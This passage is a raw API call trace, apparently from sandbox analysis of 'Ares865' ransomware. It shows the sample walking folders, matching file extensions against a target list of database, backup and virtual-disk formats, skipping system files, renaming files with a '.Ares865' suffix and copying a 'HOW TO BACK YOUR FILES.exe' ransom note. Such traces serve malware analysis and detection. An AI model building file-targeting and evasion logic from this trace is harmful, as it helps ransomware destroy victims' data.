lstrlenW (lpString="orx") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="orx") returned 1 [0090.236] lstrlenW (lpString="owc") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="owc") returned 1 [0090.236] lstrlenW (lpString="p96") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="p96") returned 1 [0090.236] lstrlenW (lpString="p97") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="p97") returned 1 [0090.236] lstrlenW (lpString="pan") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="pan") returned 1 [0090.236] lstrlenW (lpString="pdb") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="pdb") returned 1 [0090.236] lstrlenW (lpString="pdm") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="pdm") returned 1 [0090.237] lstrlenW (lpString="pnz") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="pnz") returned 1 [0090.237] lstrlenW (lpString="qry") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="qry") returned 1 [0090.237] lstrlenW (lpString="qvd") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="qvd") returned 1 [0090.237] lstrlenW (lpString="rbf") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="rbf") returned 1 [0090.237] lstrlenW (lpString="rctd") returned 4 [0090.237] lstrcmpiW (lpString1=".sdf", lpString2="rctd") returned -1 [0090.237] lstrlenW (lpString="rod") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="rod") returned 1 [0090.237] lstrlenW (lpString="rodx") returned 4 [0090.237] lstrcmpiW (lpString1=".sdf", lpString2="rodx") returned -1 [0090.237] lstrlenW (lpString="rpd") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="rpd") returned 1 [0090.237] lstrlenW (lpString="rsd") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="rsd") returned 1 [0090.237] lstrlenW (lpString="sas7bdat") returned 8 [0090.237] lstrcmpiW (lpString1="base.sdf", lpString2="sas7bdat") returned -1 [0090.237] lstrlenW (lpString="sbf") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="sbf") returned 1 [0090.237] lstrlenW (lpString="scx") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="scx") returned 1 [0090.237] lstrlenW (lpString="sdb") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="sdb") returned 1 [0090.237] lstrlenW (lpString="sdc") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="sdc") returned 1 [0090.237] lstrlenW (lpString="sdf") returned 3 [0090.237] lstrcmpiW (lpString1="sdf", lpString2="sdf") returned 0 [0090.237] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0090.237] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.237] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="aoldtz.exe") returned 1 [0090.237] lstrcpyW (in: lpString1=0x2cce478, lpString2="RacMetaData.dat" | out: lpString1="RacMetaData.dat") returned="RacMetaData.dat" [0090.238] lstrlenW (lpString="RacMetaData.dat") returned 15 [0090.238] lstrlenW (lpString="Ares865") returned 7 [0090.238] lstrcmpiW (lpString1="ata.dat", lpString2="Ares865") returned 1 [0090.238] lstrlenW (lpString=".dll") returned 4 [0090.238] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".dll") returned 1 [0090.238] lstrlenW (lpString=".lnk") returned 4 [0090.238] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".lnk") returned 1 [0090.238] lstrlenW (lpString=".ini") returned 4 [0090.238] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".ini") returned 1 [0090.238] lstrlenW (lpString=".sys") returned 4 [0090.238] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".sys") returned 1 [0090.238] lstrlenW (lpString="RacMetaData.dat") returned 15 [0090.238] lstrlenW (lpString="bak") returned 3 [0090.238] lstrcmpiW (lpString1="dat", lpString2="bak") returned 1 [0090.238] lstrlenW (lpString="ba_") returned 3 [0090.238] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0090.238] lstrlenW (lpString="dbb") returned 3 [0090.238] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0090.238] lstrlenW (lpString="vmdk") returned 4 [0090.238] lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0090.238] lstrlenW (lpString="rar") returned 3 [0090.238] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0090.238] lstrlenW (lpString="zip") returned 3 [0090.238] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0090.238] lstrlenW (lpString="tgz") returned 3 [0090.238] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0090.238] lstrlenW (lpString="vbox") returned 4 [0090.238] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0090.238] lstrlenW (lpString="vdi") returned 3 [0090.238] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0090.238] lstrlenW (lpString="vhd") returned 3 [0090.238] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0090.238] lstrlenW (lpString="vhdx") returned 4 [0090.238] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0090.238] lstrlenW (lpString="avhd") returned 4 [0090.238] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0090.238] lstrlenW (lpString="db") returned 2 [0090.238] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0090.238] lstrlenW (lpString="db2") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0090.239] lstrlenW (lpString="db3") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0090.239] lstrlenW (lpString="dbf") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0090.239] lstrlenW (lpString="mdf") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0090.239] lstrlenW (lpString="mdb") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0090.239] lstrlenW (lpString="sql") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0090.239] lstrlenW (lpString="sqlite") returned 6 [0090.239] lstrcmpiW (lpString1="ta.dat", lpString2="sqlite") returned 1 [0090.239] lstrlenW (lpString="sqlite3") returned 7 [0090.239] lstrcmpiW (lpString1="ata.dat", lpString2="sqlite3") returned -1 [0090.239] lstrlenW (lpString="sqlitedb") returned 8 [0090.239] lstrcmpiW (lpString1="Data.dat", lpString2="sqlitedb") returned -1 [0090.239] lstrlenW (lpString="xml") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0090.239] lstrlenW (lpString="$er") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0090.239] lstrlenW (lpString="4dd") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0090.239] lstrlenW (lpString="4dl") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0090.239] lstrlenW (lpString="^^^") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0090.239] lstrlenW (lpString="abs") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0090.239] lstrlenW (lpString="abx") returned 3 [0090.239] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0090.239] lstrlenW (lpString="accdb") returned 5 [0090.239] lstrcmpiW (lpString1="a.dat", lpString2="accdb") returned -1 [0090.239] lstrlenW (lpString="accdc") returned 5 [0090.239] lstrcmpiW (lpString1="a.dat", lpString2="accdc") returned -1 [0090.239] lstrlenW (lpString="accde") returned 5 [0090.239] lstrcmpiW (lpString1="a.dat", lpString2="accde") returned -1 [0090.239] lstrlenW (lpString="accdr") returned 5 [0090.240] lstrcmpiW (lpString1="a.dat", lpString2="accdr") returned -1 [0090.240] lstrlenW (lpString="accdt") returned 5 [0090.240] lstrcmpiW (lpString1="a.dat", lpString2="accdt") returned -1 [0090.240] lstrlenW (lpString="accdw") returned 5 [0090.240] lstrcmpiW (lpString1="a.dat", lpString2="accdw") returned -1 [0090.240] lstrlenW (lpString="accft") returned 5 [0090.240] lstrcmpiW (lpString1="a.dat", lpString2="accft") returned -1 [0090.240] lstrlenW (lpString="adb") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0090.240] lstrlenW (lpString="adb") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0090.240] lstrlenW (lpString="ade") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0090.240] lstrlenW (lpString="adf") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0090.240] lstrlenW (lpString="adn") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0090.240] lstrlenW (lpString="adp") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0090.240] lstrlenW (lpString="alf") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0090.240] lstrlenW (lpString="ask") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0090.240] lstrlenW (lpString="btr") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0090.240] lstrlenW (lpString="cat") returned 3 [0090.240] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0090.240] lstrlenW (lpString="cdb") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0090.241] lstrlenW (lpString="ckp") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0090.241] lstrlenW (lpString="cma") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0090.241] lstrlenW (lpString="cpd") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0090.241] lstrlenW (lpString="dacpac") returned 6 [0090.241] lstrcmpiW (lpString1="ta.dat", lpString2="dacpac") returned 1 [0090.241] lstrlenW (lpString="dad") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0090.241] lstrlenW (lpString="dadiagrams") returned 10 [0090.241] lstrcmpiW (lpString1="taData.dat", lpString2="dadiagrams") returned 1 [0090.241] lstrlenW (lpString="daschema") returned 8 [0090.241] lstrcmpiW (lpString1="Data.dat", lpString2="daschema") returned 1 [0090.241] lstrlenW (lpString="db-journal") returned 10 [0090.241] lstrcmpiW (lpString1="taData.dat", lpString2="db-journal") returned 1 [0090.241] lstrlenW (lpString="db-shm") returned 6 [0090.241] lstrcmpiW (lpString1="ta.dat", lpString2="db-shm") returned 1 [0090.241] lstrlenW (lpString="db-wal") returned 6 [0090.241] lstrcmpiW (lpString1="ta.dat", lpString2="db-wal") returned 1 [0090.241] lstrlenW (lpString="dbc") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0090.241] lstrlenW (lpString="dbs") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0090.241] lstrlenW (lpString="dbt") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0090.241] lstrlenW (lpString="dbv") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0090.241] lstrlenW (lpString="dbx") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0090.241] lstrlenW (lpString="dcb") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0090.241] lstrlenW (lpString="dct") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dct") returned -1 [0090.241] lstrlenW (lpString="dcx") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="dcx") returned -1 [0090.241] lstrlenW (lpString="ddl") returned 3 [0090.241] lstrcmpiW (lpString1="dat", lpString2="ddl") returned -1 [0090.242] lstrlenW (lpString="dlis") returned 4 [0090.242] lstrcmpiW (lpString1=".dat", lpString2="dlis") returned -1 [0090.242] lstrlenW (lpString="dp1") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="dp1") returned -1 [0090.242] lstrlenW (lpString="dqy") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="dqy") returned -1 [0090.242] lstrlenW (lpString="dsk") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="dsk") returned -1 [0090.242] lstrlenW (lpString="dsn") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="dsn") returned -1 [0090.242] lstrlenW (lpString="dtsx") returned 4 [0090.242] lstrcmpiW (lpString1=".dat", lpString2="dtsx") returned -1 [0090.242] lstrlenW (lpString="dxl") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="dxl") returned -1 [0090.242] lstrlenW (lpString="eco") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="eco") returned -1 [0090.242] lstrlenW (lpString="ecx") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="ecx") returned -1 [0090.242] lstrlenW (lpString="edb") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="edb") returned -1 [0090.242] lstrlenW (lpString="epim") returned 4 [0090.242] lstrcmpiW (lpString1=".dat", lpString2="epim") returned -1 [0090.242] lstrlenW (lpString="fcd") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="fcd") returned -1 [0090.242] lstrlenW (lpString="fdb") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="fdb") returned -1 [0090.242] lstrlenW (lpString="fic") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="fic") returned -1 [0090.242] lstrlenW (lpString="flexolibrary") returned 12 [0090.242] lstrcmpiW (lpString1="MetaData.dat", lpString2="flexolibrary") returned 1 [0090.242] lstrlenW (lpString="fm5") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="fm5") returned -1 [0090.242] lstrlenW (lpString="fmp") returned 3 [0090.242] lstrcmpiW (lpString1="dat", lpString2="fmp") returned -1 [0090.242] lstrlenW (lpString="fmp12") returned 5 [0090.242] lstrcmpiW (lpString1="a.dat", lpString2="fmp12") returned -1 [0090.242] lstrlenW (lpString="fmpsl") returned 5 [0090.242] lstrcmpiW (lpString1="a.dat", lpString2="fmpsl") returned -1 [0090.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 83 [0090.243] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.243] GetLastError () returned 0x20 [0090.243] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 105 [0090.243] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 105 [0090.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.243] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4807 [0090.243] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x69, lpOverlapped=0x0) returned 1 [0090.243] CloseHandle (hObject=0x118) returned 1 [0090.244] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.244] CloseHandle (hObject=0x0) returned 0 [0090.244] CloseHandle (hObject=0x0) returned 0 [0090.244] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.244] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.244] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0090.244] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData" [0090.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0090.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0090.244] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData") returned 63 [0090.244] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData" [0090.244] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.244] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\publisheddata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.244] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.245] GetLastError () returned 0x0 [0090.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.245] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.245] CloseHandle (hObject=0x120) returned 1 [0090.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.245] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.245] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.245] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.245] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.245] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.245] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.245] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.245] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.245] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.245] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.245] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c59d4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.245] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.245] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0090.245] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.245] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="aoldtz.exe") returned 1 [0090.245] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".") returned 1 [0090.245] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="..") returned 1 [0090.245] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="windows") returned -1 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="bootmgr") returned 1 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="temp") returned -1 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="pagefile.sys") returned 1 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="boot") returned 1 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="ids.txt") returned 1 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="ntuser.dat") returned 1 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="perflogs") returned 1 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="MSBuild") returned 1 [0090.246] lstrlenW (lpString="RacWmiDatabase.sdf") returned 18 [0090.246] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\*") returned 65 [0090.246] lstrcpyW (in: lpString1=0x2cce480, lpString2="RacWmiDatabase.sdf" | out: lpString1="RacWmiDatabase.sdf") returned="RacWmiDatabase.sdf" [0090.246] lstrlenW (lpString="RacWmiDatabase.sdf") returned 18 [0090.246] lstrlenW (lpString="Ares865") returned 7 [0090.246] lstrcmpiW (lpString1="ase.sdf", lpString2="Ares865") returned 1 [0090.246] lstrlenW (lpString=".dll") returned 4 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".dll") returned 1 [0090.246] lstrlenW (lpString=".lnk") returned 4 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".lnk") returned 1 [0090.246] lstrlenW (lpString=".ini") returned 4 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".ini") returned 1 [0090.246] lstrlenW (lpString=".sys") returned 4 [0090.246] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".sys") returned 1 [0090.246] lstrlenW (lpString="RacWmiDatabase.sdf") returned 18 [0090.246] lstrlenW (lpString="bak") returned 3 [0090.246] lstrcmpiW (lpString1="sdf", lpString2="bak") returned 1 [0090.246] lstrlenW (lpString="ba_") returned 3 [0090.246] lstrcmpiW (lpString1="sdf", lpString2="ba_") returned 1 [0090.246] lstrlenW (lpString="dbb") returned 3 [0090.246] lstrcmpiW (lpString1="sdf", lpString2="dbb") returned 1 [0090.246] lstrlenW (lpString="vmdk") returned 4 [0090.246] lstrcmpiW (lpString1=".sdf", lpString2="vmdk") returned -1 [0090.246] lstrlenW (lpString="rar") returned 3 [0090.246] lstrcmpiW (lpString1="sdf", lpString2="rar") returned 1 [0090.246] lstrlenW (lpString="zip") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="zip") returned -1 [0090.247] lstrlenW (lpString="tgz") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="tgz") returned -1 [0090.247] lstrlenW (lpString="vbox") returned 4 [0090.247] lstrcmpiW (lpString1=".sdf", lpString2="vbox") returned -1 [0090.247] lstrlenW (lpString="vdi") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="vdi") returned -1 [0090.247] lstrlenW (lpString="vhd") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="vhd") returned -1 [0090.247] lstrlenW (lpString="vhdx") returned 4 [0090.247] lstrcmpiW (lpString1=".sdf", lpString2="vhdx") returned -1 [0090.247] lstrlenW (lpString="avhd") returned 4 [0090.247] lstrcmpiW (lpString1=".sdf", lpString2="avhd") returned -1 [0090.247] lstrlenW (lpString="db") returned 2 [0090.247] lstrcmpiW (lpString1="df", lpString2="db") returned 1 [0090.247] lstrlenW (lpString="db2") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="db2") returned 1 [0090.247] lstrlenW (lpString="db3") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="db3") returned 1 [0090.247] lstrlenW (lpString="dbf") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="dbf") returned 1 [0090.247] lstrlenW (lpString="mdf") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="mdf") returned 1 [0090.247] lstrlenW (lpString="mdb") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="mdb") returned 1 [0090.247] lstrlenW (lpString="sql") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="sql") returned -1 [0090.247] lstrlenW (lpString="sqlite") returned 6 [0090.247] lstrcmpiW (lpString1="se.sdf", lpString2="sqlite") returned -1 [0090.247] lstrlenW (lpString="sqlite3") returned 7 [0090.247] lstrcmpiW 